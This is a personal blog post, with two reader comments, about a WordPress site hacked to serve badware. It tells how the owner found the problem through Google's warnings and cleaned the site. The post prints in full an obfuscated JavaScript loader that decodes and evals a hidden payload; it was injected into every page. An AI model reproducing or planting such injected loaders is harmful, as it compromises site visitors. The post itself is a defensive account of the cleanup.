Those of you on Enlightened* computers may have noticed my website attempting to do some Moderately Bad Things to you as you browsed my blog and other material. I think I’m in the final stages of ripping out the crap that has infected this site while I was looking the other way. Some of you may find this stuff interesting.
This process started last week when I was in Kauai. I logged in from my new MacBook Pro to write a blog on my and Ruth’s trip. But when I typed in the URL, the following screen appeared in my browser:
I have to say that I had a brief moment of panic when I saw this. This message was as much of a surprise to me as it was a concern. And I had no idea what was going on. A few questions passed my mind:
- What happened to my site?
- When did this happen?
- What software was intercepting my attempts to access my site and refusing entry?
The fact that I was nervous about this breach while on vacation was unfortunate. But its in my nature to want to correct problems like this so I put my vacation on hold for a few hours to figure this out.
After a few minutes poking around I was able to use Google’s wonderful Webmaster Central to identify the source of the alarm. This site–offered as a free service by Google–detected Badware on my website and was informing and stopping Google users from accessing the site. By Google “user” I mean anyone that has logged into Google and is using the Google toolbar (such as the one that is installed with Firefox by default.)
It took me more reading to find out what they meant by badware. But helpful links to a non-profit web site quickly educated me on the subject. In short, badware is anything that does undesireable things to a web browser’s computer. In my case, this meant displaying banner ads, redirecting content from a third-party, and downloading remote management software that would ostensibly allow a third-party to read data off of your computer.
After more work I found a bunch of problems with a variety of pages on my site but most were coming from my WordPress blog software. For instance, look at this nefarious javascript that had been inserted into the header and footer of every WordPress page on my site:
<script language=JavaScript> function atibnb25(z) { var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,59,50,30,25,47,38,15,36,17,0,0,0,0,0,0,23,41,52,27,18,31,22,9,37,45,35,57,10,61,39,24,51,20,1,6,49,13,32,53,7,28,4,0,0,0,0,3,0,21,33,60,19,14,54,0,55,48,8,5,34,16,40,42,62,58,2,12,26,44,46,11,29,56,43);for(s=Math.ceil(c/m);s>0;s–){h=”;for(i=Math.min(c,m);i>0;i–,c–){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(228^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}atibnb25(‘dfnlgvy8LEG8kr48@6MiVvnlRechgvyb96OVLrA2dt4JmSjP_JxJrt4bGSjTLFOlR6IV@_UhZEAHX6ITsrG8QqM2w7xbgrOJmfylLoYJLLylw_K2C7cPAFj8souHwSAlg2YokrGJLC4bLrylG2YPe@xWFCUBU0cir3UBY7cP_CsTdfjVm2OfaPUBZPOVUejJm6IBadcHmfGlR6ITgfyHQlObxqIlwoOVSzUfwhnVFFOlRoMiU_’) </script>
I’m not entirely sure what this does, but I’m told that it redirects content to or from a third party without readers knowing it’s happening. But by cleaning out code like this, fixing modified .htaccess files, upgrading WordPress, disabling my wiki, and changing user IDs and passwords for all kinds of stuff, I think my site is clean.
Now I’m following the process of getting Google’s stamp-of-approval for my content. Since I’ve had some third-party support in verifying that some of my pages are clean, I’m reasonably confident I’ve corrected the problem. But until Google crawls my site again, you’ll see the following warning under the link if you search for my pages on Google:
The moral of this story is as follows:
- Despite being a big pain in my ass, Google is a much better company that most people realize. They are identifying, blocking, and helping correct dangerous garbage like this at no charge to you or me.
- Always run virus protection and spyware scanners on your system and keep them up-to-date.
- Know that just because a page looks clean doesn’t mean that it is clean.
- Run software other than vanilla Microsoft products unless you know what you’re doing with your Microsoft stuff.
More updates are certain to follow as I continue to work on this problem.
(*) Anything other than your vanilla Windows system. Changes in OS, web browser, virus or spyware detection were likely to result in feature additions that avoid this problem. But there’s no replacement for simply knowing what you’re doing.
Well , I have seen this script inside the php files while my blog was hacked and infected . This java script is injected in to the wp-login.php and admin-footer.php files by the hacker. For more details please read this article : http://www.itoneworldsystem.com/blog/2009/01/03/how-to-remove-malware-from-your-blog/
In this article , step by step removal process is described .
Fantastic link. Thanks for sharing!